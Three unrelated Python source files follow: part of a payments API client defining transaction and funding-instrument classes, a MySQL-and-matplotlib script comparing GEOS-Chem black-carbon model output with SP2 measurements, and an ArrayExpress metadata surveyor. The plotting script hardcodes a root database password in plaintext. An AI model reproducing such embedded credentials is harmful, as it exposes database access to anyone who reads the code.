"""
return Reversal(
href=self.reversals.href,
**kwargs
).save()
class Debit(Transaction):
"""
A Debit represents a transfer of funds from a FundingInstrument to your
Marketplace's escrow account.
A Debit may be created directly, or it will be created as a side-effect
of capturing a CardHold. If you create a Debit directly it will implicitly
create the associated CardHold if the FundingInstrument supports this.
"""
type = 'debits'
uri_gen = wac.URIGen('/debits', '{debit}')
def refund(self, **kwargs):
"""
Refunds this Debit. If no amount is specified it will refund the entire
amount of the Debit, you may create many Refunds up to the sum total
of the original Debit's amount.
:rtype: Refund
"""
return Refund(
href=self.refunds.href,
**kwargs
).save()
class Refund(Transaction):
"""
A Refund represents a reversal of funds from a Debit. A Debit can have
many Refunds associated with it up to the total amount of the original
Debit. Funds are returned to your Marketplace's escrow account
proportional to the amount of the Refund.
"""
type = 'refunds'
uri_gen = wac.URIGen('/refunds', '{refund}')
class Reversal(Transaction):
"""
A Reversal represents a reversal of funds from a Credit. A Credit can have
many Reversal associated with it up to the total amount of the original
Credit. Funds are returned to your Marketplace's escrow account
proportional to the amount of the Reversal.
"""
type = 'reversals'
uri_gen = wac.URIGen('/reversals', '{reversal}')
class FundingInstrument(Resource):
"""
A FundingInstrument is either (or both) a source or destination of funds.
You may perform `debit` or `credit` operations on a FundingInstrument to
transfer funds to or from your Marketplace's escrow.
"""
type = 'funding_instruments'
def associate_to_customer(self, customer):
try:
self.links
except AttributeError:
self.links = {}
self.links['customer'] = utils.extract_href_from_object(customer)
self.save()
def debit(self, amount, **kwargs):
"""
Creates a Debit of funds from this FundingInstrument to your
Marketplace's escrow account.
:param appears_on_statement_as: If None then Balanced will use the
`domain_name` property from your Marketplace.
:rtype: Debit
"""
return Debit(
href=self.debits.href,
amount=amount,
**kwargs
).save()
def credit(self, amount, **kwargs):
"""
Creates a Credit of funds from your Marketplace's escrow account to
this FundingInstrument.
:rtype: Credit
"""
if not hasattr(self, 'credits'):
raise exc.FundingSourceNotCreditable()
return Credit(
href=self.credits.href,
amount=amount,
**kwargs
).save()
class BankAccount(FundingInstrument):
"""
A BankAccount is both a source, and a destination of, funds. You may
create Debits and Credits to and from, this funding instrument.
"""
type = 'bank_accounts'
uri_gen = wac.URIGen('/bank_accounts', '{bank_account}')
def verify(self):
"""
Creates a verification of the associated BankAccount so it can
perform verified operations (debits).
:rtype: BankAccountVerification
"""
return BankAccountVerification(
href=self.bank_account_verifications.href
).save()
class BankAccountVerification(Resource):
"""
Represents an attempt to verify the associated BankAccount so it can
perform verified operations (debits).
"""
type = 'bank_account_verifications'
def confirm(self, amount_1, amount_2):
self.amount_1 = amount_1
self.amount_2 = amount_2
return self.save()
class Card(FundingInstrument):
"""
A card represents a source of funds. You may Debit funds from the Card.
"""
type = 'cards'
uri_gen = wac.URIGen('/cards', '{card}')
def hold(self, amount, **kwargs):
return CardHold(
href=self.card_holds.href,
amount=amount,
**kwargs
).save()
class Customer(Resource):
"""
A Customer represents a business or person within your Marketplace. A
Customer can have many funding instruments such as cards and bank accounts
associated to them. Customers are logical grouping constructs for
associating many Transactions and FundingInstruments.
"""
type = 'customers'
uri_gen = wac.URIGen('/customers', '{customer}')
def create_order(self, **kwargs):
return Order(href=self.orders.href, **kwargs).save()
@property
def payable_account(self):
return self.accounts.filter(type="payable").first()
class Order(Resource):
"""
An Order is a logical construct for grouping Transactions.
An Order may have 0:n Transactions associated with it so long as the sum
(`amount_escrowed`) which is calculated as
(Debits - Refunds - Credits + Reversals), is always >= 0.
"""
type = 'orders'
uri_gen = wac.URIGen('/orders', '{order}')
def credit_to(self, destination, amount, **kwargs):
return destination.credit(order=self.href,
amount=amount,
**kwargs)
def debit_from(self, source, amount, **kwargs):
return source.debit(order=self.href,
amount=amount,
**kwargs)
class Callback(Resource):
"""
A Callback is a publicly accessible location that can receive POSTed JSON
data whenever an Event is generated.
"""
type = 'callbacks'
uri_gen = wac.URIGen('/callbacks', '{callback}')
class Dispute(Resource):
"""
A dispute occurs when a customer disputes a transaction that
occurred on their funding instrument.
"""
type = 'disputes'
uri_gen = wac.URIGen('/disputes', '{dispute}')
class Event(Resource):
"""
An Event is a snapshot of another resource at a point in time when
something significant occurred. Events are created when resources are
created, updated, deleted or otherwise change state such as a Credit being
marked as failed.
"""
type = 'events'
uri_gen = wac.URIGen('/events', '{event}')
class EventCallback(Resource):
"""
Represents a single event being sent to a callback.
"""
type = 'event_callbacks'
class EventCallbackLog(Resource):
"""
Represents a request and response from single attempt to notify a callback
of an event.
"""
type = 'event_callback_logs'
class ExternalAccount(FundingInstrument):
"""
An External Account represents a source of funds provided by an external, 3rd
party processor. You may Debit funds from the account if can_debit is true.
"""
type = 'external_accounts'
uri_gen = wac.URIGen('/external_accounts', '{external_account}')
class Account(FundingInstrument):
"""
An Account is a way to transfer funds from multiple Orders into one place,
which can later be bulk credited out.
"""
type = 'accounts'
uri_gen = wac.URIGen('/accounts', '{account}')
def settle(self, funding_instrument, **kwargs):
return Settlement(
href=self.settlements.href,
funding_instrument=funding_instrument,
**kwargs
).save()
class Settlement(Transaction):
"""
A Settlement is the action of moving money out of an Account to a
bank account.
"""
type = 'settlements'
uri_gen = wac.URIGen('/settlements', '{settlements}')
|
|
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
from pprint import pprint
from datetime import datetime
from datetime import timedelta
import mysql.connector
import pickle
import math
import calendar
from math import log10, floor
GC_error = True
test_case = 'Van'#'default' #default, Van, wet_scav, no_bb, all_together
RH_of_interest = 90 #101 = no threshold
sig_figs_SP2 = 3
sig_figs_gc = 4
def round_to_n(x,n):
return round(x, -int(floor(log10(x))) + (n - 1))
#database connection
cnx = mysql.connector.connect(user='root', password='Suresh15', host='localhost', database='black_carbon')
cursor = cnx.cursor()
data= []
red_list = []
blue_list = []
clusters = ['all','NPac','SPac','Cont','LRT']
GC_row_no = 2
cursor.execute(('SELECT 10th_percentile_mass_conc, 50th_percentile_mass_conc, 90th_percentile_mass_conc, mean_mass_conc, rel_err, data_source, test_scenario,cluster from whi_gc_and_sp2_stats_on_6h_clustered_ft_data where RH_threshold = %s and cluster = %s and test_scenario = %s '),(RH_of_interest,'all','default'))
data_raw = cursor.fetchall()
cursor.execute(('SELECT 10th_percentile_mass_conc, 50th_percentile_mass_conc, 90th_percentile_mass_conc, mean_mass_conc, rel_err, data_source, test_scenario,cluster from whi_gc_and_sp2_stats_on_6h_clustered_ft_data where RH_threshold = %s and cluster = %s and test_scenario = %s '),(RH_of_interest,'all',test_case))
wet_scav_data = cursor.fetchall()
data_raw.append(wet_scav_data[0])
for row in data_raw:
data_source = row[5]
case= row[6]
if data_source == 'SP2':
p10_sp2 = row[0]
p50_sp2 = row[1]
p90_sp2 = row[2]
mean_sp2 = row[3]
rel_err_sp2 = row[4]
if data_source == 'GEOS-Chem' and case == 'default':
p10_gc = row[0]
p50_gc = row[1]
p90_gc = row[2]
mean_gc = row[3]
if GC_error == True:
rel_err_gc = row[4]
else:
rel_err_gc = 0
if data_source == 'GEOS-Chem' and case == test_case:
p10_gc_ws = row[0]
p50_gc_ws = row[1]
p90_gc_ws = row[2]
mean_gc_ws = row[3]
if GC_error == True:
rel_err_gc_ws = row[4]
else:
rel_err_gc_ws = 0
SP2_10 = str(round_to_n(p10_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(p10_sp2*rel_err_sp2,sig_figs_SP2))
SP2_50 = str(round_to_n(p50_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(p50_sp2*rel_err_sp2,sig_figs_SP2))
SP2_90 = str(round_to_n(p90_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(p90_sp2*rel_err_sp2,sig_figs_SP2))
SP2_mean = str(round_to_n(mean_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(mean_sp2*rel_err_sp2,sig_figs_SP2))
if GC_error == True:
GC_10 = str(round_to_n(p10_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p10_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc/p10_sp2,3)) + ')'
GC_50 = str(round_to_n(p50_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p50_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc/p50_sp2,3)) + ')'
GC_90 = str(round_to_n(p90_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p90_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc/p90_sp2,3)) + ')'
GC_mean = str(round_to_n(mean_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(mean_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc/mean_sp2,3)) + ')'
GC_10_ws = str(round_to_n(p10_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p10_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc_ws/p10_sp2,3)) + ')'
GC_50_ws = str(round_to_n(p50_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p50_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc_ws/p50_sp2,3)) + ')'
GC_90_ws = str(round_to_n(p90_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p90_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc_ws/p90_sp2,3)) + ')'
GC_mean_ws = str(round_to_n(mean_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(mean_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc_ws/mean_sp2,3)) + ')'
else:
GC_10 = str(round_to_n(p10_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc/p10_sp2,3)) + ')'
GC_50 = str(round_to_n(p50_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc/p50_sp2,3)) + ')'
GC_90 = str(round_to_n(p90_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc/p90_sp2,3)) + ')'
GC_mean = str(round_to_n(mean_gc,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc/mean_sp2,3)) + ')'
GC_10_ws = str(round_to_n(p10_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc_ws/p10_sp2,3)) + ')'
GC_50_ws = str(round_to_n(p50_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc_ws/p50_sp2,3)) + ')'
GC_90_ws = str(round_to_n(p90_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc_ws/p90_sp2,3)) + ')'
GC_mean_ws = str(round_to_n(mean_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc_ws/mean_sp2,3)) + ')'
GC_list = [p10_gc, p50_gc, p90_gc, mean_gc]
GC_list_ws = [p10_gc_ws, p50_gc_ws, p90_gc_ws, mean_gc_ws]
SP2_list = [p10_sp2, p50_sp2, p90_sp2, mean_sp2]
i = 0
for value in GC_list:
if (value - value*rel_err_gc) > (SP2_list[i]+ SP2_list[i]*rel_err_sp2):
red_list.append((2,i+1))
if (value + value*rel_err_gc) < (SP2_list[i]- SP2_list[i]*rel_err_sp2):
blue_list.append((2,i+1))
i+=1
i = 0
for value in GC_list_ws:
if (value - value*rel_err_gc_ws) > (SP2_list[i]+ SP2_list[i]*rel_err_sp2):
red_list.append((3,i+1))
if (value + value*rel_err_gc_ws) < (SP2_list[i]- SP2_list[i]*rel_err_sp2):
blue_list.append((3,i+1))
i+=1
table_row_SP2 = ['Measurement',SP2_10,SP2_50,SP2_90,SP2_mean]
table_row_GC = ['GEOS-Chem\ndefault scenario', GC_10,GC_50,GC_90,GC_mean]
table_row_GC_ws = ['GEOS-Chem\n' + str(test_case), GC_10_ws,GC_50_ws,GC_90_ws,GC_mean_ws]
data.append(table_row_SP2)
data.append(table_row_GC)
data.append(table_row_GC_ws)
colLabels=('data source','10th ptile', '50th ptile', '90th ptile', 'mean')
fig=plt.figure()
ax = fig.add_subplot(111)
ax.axis('off')
#do the table
the_table = ax.table(cellText=data,
colLabels=colLabels,
loc='center')
table_props=the_table.properties()
table_cells=table_props['child_artists']
i=0
for cell in table_cells:
ht = cell.get_height()
wd = cell.get_width()
cell.set_width(wd*1)
cell.set_height(ht*2.2)
cell.set_fontsize(14)
#if i in [1,3,5,7]:
# cell.set_linewidth(4)
i+=1
cellDict = the_table.get_celld()
for cell in red_list:
cellDict[cell]._text.set_color('r')
for cell in blue_list:
cellDict[cell]._text.set_color('b')
os.chdir('C:/Users/Sarah Hanna/Documents/Data/WHI long term record/GOES-Chem/')
plt.savefig('GC default v10 vs SP2 by cluster for WHI - ' + 'all' + ' - ' + str(RH_of_interest) + '% RH threshold - ' + str(test_case) + '.png',bbox_inches='tight')
plt.show()
#######################
data= []
red_list = []
blue_list = []
clusters = ['NPac','SPac','Cont','LRT']
GC_row_no = 2
for cluster in clusters:
cursor.execute(('SELECT 10th_percentile_mass_conc, 50th_percentile_mass_conc, 90th_percentile_mass_conc, mean_mass_conc, rel_err, data_source, test_scenario,cluster from whi_gc_and_sp2_stats_on_6h_clustered_ft_data where RH_threshold = %s and cluster = %s and test_scenario = %s '),(RH_of_interest,cluster,'default'))
data_raw = cursor.fetchall()
cursor.execute(('SELECT 10th_percentile_mass_conc, 50th_percentile_mass_conc, 90th_percentile_mass_conc, mean_mass_conc, rel_err, data_source, test_scenario,cluster from whi_gc_and_sp2_stats_on_6h_clustered_ft_data where RH_threshold = %s and cluster = %s and test_scenario = %s '),(RH_of_interest,cluster,test_case))
wet_scav_data = cursor.fetchall()
data_raw.append(wet_scav_data[0])
pprint(data_raw)
for row in data_raw:
print row
data_source = row[5]
case= row[6]
if data_source == 'SP2':
p10_sp2 = row[0]
p50_sp2 = row[1]
p90_sp2 = row[2]
mean_sp2 = row[3]
rel_err_sp2 = row[4]
if data_source == 'GEOS-Chem' and case == 'default':
p10_gc = row[0]
p50_gc = row[1]
p90_gc = row[2]
mean_gc = row[3]
if GC_error == True:
rel_err_gc = row[4]
else:
rel_err_gc = 0
if data_source == 'GEOS-Chem' and case == test_case:
p10_gc_ws = row[0]
p50_gc_ws = row[1]
p90_gc_ws = row[2]
mean_gc_ws = row[3]
if GC_error == True:
rel_err_gc = row[4]
else:
rel_err_gc = 0
SP2_10 = str(round_to_n(p10_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(p10_sp2*rel_err_sp2,sig_figs_SP2))
SP2_50 = str(round_to_n(p50_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(p50_sp2*rel_err_sp2,sig_figs_SP2))
SP2_90 = str(round_to_n(p90_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(p90_sp2*rel_err_sp2,sig_figs_SP2))
SP2_mean = str(round_to_n(mean_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(mean_sp2*rel_err_sp2,sig_figs_SP2))
if GC_error == True:
GC_10 = str(round_to_n(p10_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p10_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc/p10_sp2,3)) + ')'
GC_50 = str(round_to_n(p50_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p50_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc/p50_sp2,3)) + ')'
GC_90 = str(round_to_n(p90_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p90_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc/p90_sp2,3)) + ')'
GC_mean = str(round_to_n(mean_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(mean_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc/mean_sp2,3)) + ')'
GC_10_ws = str(round_to_n(p10_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p10_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc_ws/p10_sp2,3)) + ')'
GC_50_ws = str(round_to_n(p50_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p50_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc_ws/p50_sp2,3)) + ')'
GC_90_ws = str(round_to_n(p90_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p90_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc_ws/p90_sp2,3)) + ')'
GC_mean_ws = str(round_to_n(mean_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(mean_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc_ws/mean_sp2,3)) + ')'
else:
GC_10 = str(round_to_n(p10_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc/p10_sp2,3)) + ')'
GC_50 = str(round_to_n(p50_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc/p50_sp2,3)) + ')'
GC_90 = str(round_to_n(p90_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc/p90_sp2,3)) + ')'
GC_mean = str(round_to_n(mean_gc,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc/mean_sp2,3)) + ')'
GC_10_ws = str(round_to_n(p10_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc_ws/p10_sp2,3)) + ')'
GC_50_ws = str(round_to_n(p50_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc_ws/p50_sp2,3)) + ')'
GC_90_ws = str(round_to_n(p90_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc_ws/p90_sp2,3)) + ')'
GC_mean_ws = str(round_to_n(mean_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc_ws/mean_sp2,3)) + ')'
GC_list = [p10_gc, p50_gc, p90_gc, mean_gc]
GC_list_ws = [p10_gc_ws, p50_gc_ws, p90_gc_ws, mean_gc_ws]
SP2_list = [p10_sp2, p50_sp2, p90_sp2, mean_sp2]
i = 0
for value in GC_list:
if (value - value*rel_err_gc) > (SP2_list[i]+ SP2_list[i]*rel_err_sp2):
red_list.append((GC_row_no,i+2))
if (value + value*rel_err_gc) < (SP2_list[i]- SP2_list[i]*rel_err_sp2):
blue_list.append((GC_row_no,i+2))
i+=1
i = 0
for value in GC_list_ws:
if (value - value*rel_err_gc_ws) > (SP2_list[i]+ SP2_list[i]*rel_err_sp2):
red_list.append((GC_row_no+1,i+2))
if (value + value*rel_err_gc_ws) < (SP2_list[i]- SP2_list[i]*rel_err_sp2):
blue_list.append((GC_row_no+1,i+2))
i+=1
table_row_SP2 = [cluster, 'Measurement',SP2_10,SP2_50,SP2_90,SP2_mean]
table_row_GC = ['','GEOS-Chem\ndefault scenario', GC_10,GC_50,GC_90,GC_mean]
table_row_GC_ws = ['','GEOS-Chem\n' + str(test_case), GC_10_ws,GC_50_ws,GC_90_ws,GC_mean_ws]
data.append(table_row_SP2)
data.append(table_row_GC)
data.append(table_row_GC_ws)
GC_row_no +=3
colLabels=('cluster','data source','10th ptile', '50th ptile', '90th ptile', 'mean')
fig=plt.figure()
ax = fig.add_subplot(111)
ax.axis('off')
#do the table
the_table = ax.table(cellText=data,
colLabels=colLabels,
loc='center')
table_props=the_table.properties()
table_cells=table_props['child_artists']
i=0
for cell in table_cells:
ht = cell.get_height()
wd = cell.get_width()
cell.set_width(wd*1.3)
cell.set_height(ht*3)
cell.set_fontsize(14)
#if i in [1,3,5,7]:
# cell.set_linewidth(4)
i+=1
cellDict = the_table.get_celld()
for cell in red_list:
cellDict[cell]._text.set_color('r')
for cell in blue_list:
cellDict[cell]._text.set_color('b')
os.chdir('C:/Users/Sarah Hanna/Documents/Data/WHI long term record/GOES-Chem/')
plt.savefig('GC default v10 vs SP2 by cluster for WHI - ' + 'by cluster' + ' - ' + str(RH_of_interest) + '% RH threshold - '+str(test_case)+'.png',bbox_inches='tight')
plt.show()
cnx.close()
|
|
import requests
from django.utils.dateparse import parse_datetime
from typing import List, Dict
from data_refinery_common.job_lookup import ProcessorPipeline, Downloaders
from data_refinery_common.logging import get_and_configure_logger
from data_refinery_common.models import (
Experiment,
ExperimentAnnotation,
ExperimentOrganismAssociation,
ExperimentSampleAssociation,
Organism,
OriginalFile,
OriginalFileSampleAssociation,
Sample,
SampleAnnotation,
SurveyJobKeyValue,
)
from data_refinery_common.utils import (
get_normalized_platform,
get_readable_affymetrix_names,
get_supported_microarray_platforms,
)
from data_refinery_foreman.surveyor import harmony, utils
from data_refinery_foreman.surveyor.external_source import ExternalSourceSurveyor
logger = get_and_configure_logger(__name__)
EXPERIMENTS_URL = "https://www.ebi.ac.uk/arrayexpress/json/v3/experiments/"
SAMPLES_URL = EXPERIMENTS_URL + "{}/samples"
UNKNOWN = "UNKNOWN"
class UnsupportedPlatformException(Exception):
pass
class ArrayExpressSurveyor(ExternalSourceSurveyor):
def source_type(self):
return Downloaders.ARRAY_EXPRESS.value
def create_experiment_from_api(self, experiment_accession_code: str) -> (Experiment, Dict):
"""Given an experiment accession code, create an Experiment object.
Also returns a dictionary of additional information about the
platform discovered for the experiment.
Will raise an UnsupportedPlatformException if this experiment was
conducted using a platform which we don't support.
See an example at: https://www.ebi.ac.uk/arrayexpress/json/v3/experiments/E-MTAB-3050/sample
"""
request_url = EXPERIMENTS_URL + experiment_accession_code
experiment_request = utils.requests_retry_session().get(request_url, timeout=60)
try:
parsed_json = experiment_request.json()["experiments"]["experiment"][0]
except KeyError:
logger.error("Remote experiment has no Experiment data!",
experiment_accession_code=experiment_accession_code,
survey_job=self.survey_job.id)
raise
experiment = {}
experiment["name"] = parsed_json["name"]
experiment["experiment_accession_code"] = experiment_accession_code
# This experiment has no platform at all, and is therefore useless.
if 'arraydesign' not in parsed_json or len(parsed_json["arraydesign"]) == 0:
logger.warn("Remote experiment has no arraydesign listed.",
experiment_accession_code=experiment_accession_code,
survey_job=self.survey_job.id)
raise UnsupportedPlatformException
# If there is more than one arraydesign listed in the experiment
# then there is no other way to determine which array was used
# for which sample other than looking at the header of the CEL
# file. That obviously cannot happen until the CEL file has been
# downloaded so we can just mark it as UNKNOWN and let the
# downloader inspect the downloaded file to determine the
# array then.
elif len(parsed_json["arraydesign"]) != 1 or "accession" not in parsed_json["arraydesign"][0]:
experiment["platform_accession_code"] = UNKNOWN
experiment["platform_accession_name"] = UNKNOWN
experiment["manufacturer"] = UNKNOWN
else:
external_accession = parsed_json["arraydesign"][0]["accession"]
for platform in get_supported_microarray_platforms():
if platform["external_accession"] == external_accession:
experiment["platform_accession_code"] = get_normalized_platform(platform["platform_accession"])
# Illumina appears in the accession codes for
# platforms manufactured by Illumina
if "ILLUMINA" in experiment["platform_accession_code"].upper():
experiment["manufacturer"] = "ILLUMINA"
experiment["platform_accession_name"] = platform["platform_accession"]
else:
# It's not Illumina, the only other supported Microarray platform is
# Affy. As our list of supported platforms grows this logic will
# need to get more sophisticated.
experiment["manufacturer"] = "AFFYMETRIX"
platform_mapping = get_readable_affymetrix_names()
experiment["platform_accession_name"] = platform_mapping[
platform["platform_accession"]]
if "platform_accession_code" not in experiment:
# We don't know what platform this accession corresponds to.
experiment["platform_accession_code"] = external_accession
experiment["platform_accession_name"] = UNKNOWN
experiment["manufacturer"] = UNKNOWN
experiment["release_date"] = parsed_json["releasedate"]
if "lastupdatedate" in parsed_json:
experiment["last_update_date"] = parsed_json["lastupdatedate"]
else:
experiment["last_update_date"] = parsed_json["releasedate"]
# Create the experiment object
try:
experiment_object = Experiment.objects.get(accession_code=experiment_accession_code)
logger.debug("Experiment already exists, skipping object creation.",
experiment_accession_code=experiment_accession_code,
survey_job=self.survey_job.id)
except Experiment.DoesNotExist:
# We aren't sure these fields will be populated, or how many there will be.
# Try to join them all together, or set a sensible default.
experiment_descripton = ""
if "description" in parsed_json and len(parsed_json["description"]) > 0:
for description_item in parsed_json["description"]:
if "text" in description_item:
experiment_descripton = experiment_descripton + description_item["text"] + "\n"
if experiment_descripton == "":
experiment_descripton = "Description not available.\n"
experiment_object = Experiment()
experiment_object.accession_code = experiment_accession_code
experiment_object.source_url = request_url
experiment_object.source_database = "ARRAY_EXPRESS"
experiment_object.title = parsed_json["name"]
# This will need to be updated if we ever use Array
# Express to get other kinds of data.
experiment_object.technology = "MICROARRAY"
experiment_object.description = experiment_descripton
experiment_object.source_first_published = parse_datetime(experiment["release_date"])
experiment_object.source_last_modified = parse_datetime(experiment["last_update_date"])
experiment_object.save()
json_xa = ExperimentAnnotation()
json_xa.experiment = experiment_object
json_xa.data = parsed_json
json_xa.is_ccdl = False
json_xa.save()
## Fetch and parse the IDF/SDRF file for any other fields
IDF_URL_TEMPLATE = "https://www.ebi.ac.uk/arrayexpress/files/{code}/{code}.idf.txt"
idf_url = IDF_URL_TEMPLATE.format(code=experiment_accession_code)
idf_text = utils.requests_retry_session().get(idf_url, timeout=60).text
lines = idf_text.split('\n')
idf_dict = {}
for line in lines:
keyval = line.strip().split('\t')
if len(keyval) == 2:
idf_dict[keyval[0]] = keyval[1]
elif len(keyval) > 2:
idf_dict[keyval[0]] = keyval[1:]
idf_xa = ExperimentAnnotation()
idf_xa.data = idf_dict
idf_xa.experiment = experiment_object
idf_xa.is_ccdl = False
idf_xa.save()
if 'Investigation Title' in idf_dict:
experiment_object.title = idf_dict['Investigation Title']
if 'Person Affiliation' in idf_dict:
# This is very rare, ex: E-MEXP-32
if isinstance(idf_dict['Person Affiliation'], list):
unique_people = list(set(idf_dict['Person Affiliation']))
experiment_object.submitter_institution = ", ".join(unique_people)[:255]
else:
experiment_object.submitter_institution = idf_dict['Person Affiliation']
# Get protocol_description from "<experiment_url>/protocols"
# instead of from idf_dict, because the former provides more
# details.
protocol_url = request_url + '/protocols'
protocol_request = utils.requests_retry_session().get(protocol_url, timeout=60)
try:
experiment_object.protocol_description = protocol_request.json()['protocols']
except KeyError:
logger.warning("Remote experiment has no protocol data!",
experiment_accession_code=experiment_accession_code,
survey_job=self.survey_job.id)
if 'Publication Title' in idf_dict:
# This will happen for some superseries.
# Ex: E-GEOD-29536
# Assume most recent is "best:, store the rest in experiment annotation.
if isinstance(idf_dict['Publication Title'], list):
experiment_object.publication_title = "; ".join(idf_dict['Publication Title'])
else:
experiment_object.publication_title = idf_dict['Publication Title']
experiment_object.has_publication = True
if 'Publication DOI' in idf_dict:
if isinstance(idf_dict['Publication DOI'], list):
experiment_object.publication_doi = ", ".join(idf_dict['Publication DOI'])
else:
experiment_object.publication_doi = idf_dict['Publication DOI']
experiment_object.has_publication = True
if 'PubMed ID' in idf_dict:
if isinstance(idf_dict['PubMed ID'], list):
experiment_object.pubmed_id = ", ".join(idf_dict['PubMed ID'])
else:
experiment_object.pubmed_id = idf_dict['PubMed ID']
experiment_object.has_publication = True
# Scrape publication title and authorship from Pubmed
if experiment_object.pubmed_id:
pubmed_metadata = utils.get_title_and_authors_for_pubmed_id(experiment_object.pubmed_id)
experiment_object.publication_title = pubmed_metadata[0]
experiment_object.publication_authors = pubmed_metadata[1]
experiment_object.save()
platform_dict = {}
for k in ('platform_accession_code', 'platform_accession_name', 'manufacturer'):
platform_dict[k] = experiment[k]
return experiment_object, platform_dict
def determine_sample_accession(self, experiment_accession: str, sample_source_name: str,
sample_assay_name: str, filename: str) -> str:
"""Determine what to use as the sample's accession code.
This is a complicated heuristic to determine the sample
accession because there isn't a field that consistently
contains it so we're trying to figure out a heuristic that
will work for all the data. This may need even further
refinements if we come across examples that break it.
However, what's going on is that we think either the `source`
or `assay` field will be the sample accession but it's not
always the same.
Ex: E-MEXP-669 has it in sample_assay_name.
Therefore we try a few different things to determine which it
is.
The experiment accession must be prefixed since accessions
are non-unique on AE, ex "Sample 1" is a valid assay name.
"""
# It SEEMS like the filename often contains part or all of the
# sample name so we first try to see if either field contains
# the filename with the extension stripped off:
if isinstance(filename, str):
stripped_filename = ".".join(filename.split(".")[:-1])
if stripped_filename != "":
if stripped_filename in sample_source_name:
return experiment_accession + "-" + sample_source_name
elif stripped_filename in sample_assay_name:
return experiment_accession + "-" + sample_assay_name
# Accessions don't have spaces in them, but sometimes these
# fields do so next we try to see if one has spaces and the
# other doesn't:
source_has_spaces = " " in sample_source_name
assay_has_spaces = " " in sample_assay_name
if assay_has_spaces and not source_has_spaces:
return experiment_accession + "-" + sample_source_name
elif source_has_spaces and not assay_has_spaces:
return experiment_accession + "-" + sample_assay_name
# We're out of options so return the longest one.
if len(sample_source_name) >= len(sample_assay_name):
return experiment_accession + "-" + sample_source_name
else:
return experiment_accession + "-" + sample_assay_name
@staticmethod
def extract_protocol_text(protocol_text):
"""Returns a string representation of protocol_text.
protocol_text may be a string or a list containing both
strings and dicts, like so (it's what the API returns
sometimes, see E-MEXP-2381 as an example):
[
"Microarrays were imaged using an Agilent microarray scanner in XDR (eXtended Dynamic Range function) mode and a scan resolution of 5 \u00b5m.",
{
"br": null
},
"(Parameters: Scanning hardware = DNA Microarray Scanner BA [Agilent Technologies], Scanning software = Feature Extraction Software [Agilent])"
]
"""
if not protocol_text:
return ''
elif type(protocol_text) == str:
return protocol_text.strip()
elif type(protocol_text) == list:
# These can be {"br": None}, so skip non string lines
return " ".join([line.strip() for line in protocol_text if type(line) == str])
else:
# Not sure what would get us here, but it's not worth raising an error over
return str(protocol_text)
@staticmethod
def update_sample_protocol_info(existing_protocols, experiment_protocol, protocol_url):
"""Compares experiment_protocol with a sample's
existing_protocols and updates the latter if the former includes
any new entry.
Returns a two-element tuple, the first is existing_protocols
(which may or may not have been updated) and the second is a
bool indicating whether exisiting_protocols has been updated.
